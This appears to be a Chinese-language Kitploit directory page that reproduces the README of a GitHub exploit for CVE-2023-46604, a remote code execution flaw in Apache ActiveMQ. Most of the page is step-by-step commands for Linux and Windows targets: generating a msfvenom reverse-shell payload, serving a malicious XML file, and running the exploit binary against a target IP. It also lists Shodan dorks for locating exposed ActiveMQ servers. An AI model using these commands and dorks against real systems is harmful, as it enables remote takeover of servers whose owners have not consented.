Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ — 实现Apache ActiveMQ的反向Shell漏洞利用(CVE_2023-46604) | Kitploit
工具/GitHubGitHub/saumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq
Payload生成漏洞分析漏洞利用渗透测试命令与控制远程访问工具
GitHubsaumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

实现Apache ActiveMQ的反向Shell漏洞利用(CVE_2023-46604)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
12640532年前Kitploit 审核通过

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

此漏洞利用建立在 https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE) 的基础工作上。我们进一步开发了该技术,利用 Metasploit 框架 (https://github.com/rapid7/metasploit-framework) 实现了反弹 Shell。

用法:

重要提示:请手动将 XML 文件中的 IP 地址(第 11 行的 0.0.0.0)更改为生成 payload 时的 IP 地址。如果按照以下命令操作,该 IP 应为您的监听器 IP 地址。此外,{IP_Of_Hosted_XML_File} 也将是您的监听器 IP 地址。

针对 Linux/Unix 目标

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml

针对 Windows 目标

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml

image

Shodan Dork:

  • product:"ActiveMQ OpenWire Transport"
  • image
  • product:"ActiveMQ OpenWire Transport" port:61616
  • image

出处:

  • https://github.com/X1r0z/ActiveMQ-RCE

更多阅读:

  • https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
  • https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
  • https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis

特别感谢 https://github.com/Anon4mous 对我的积极支持。

下载工具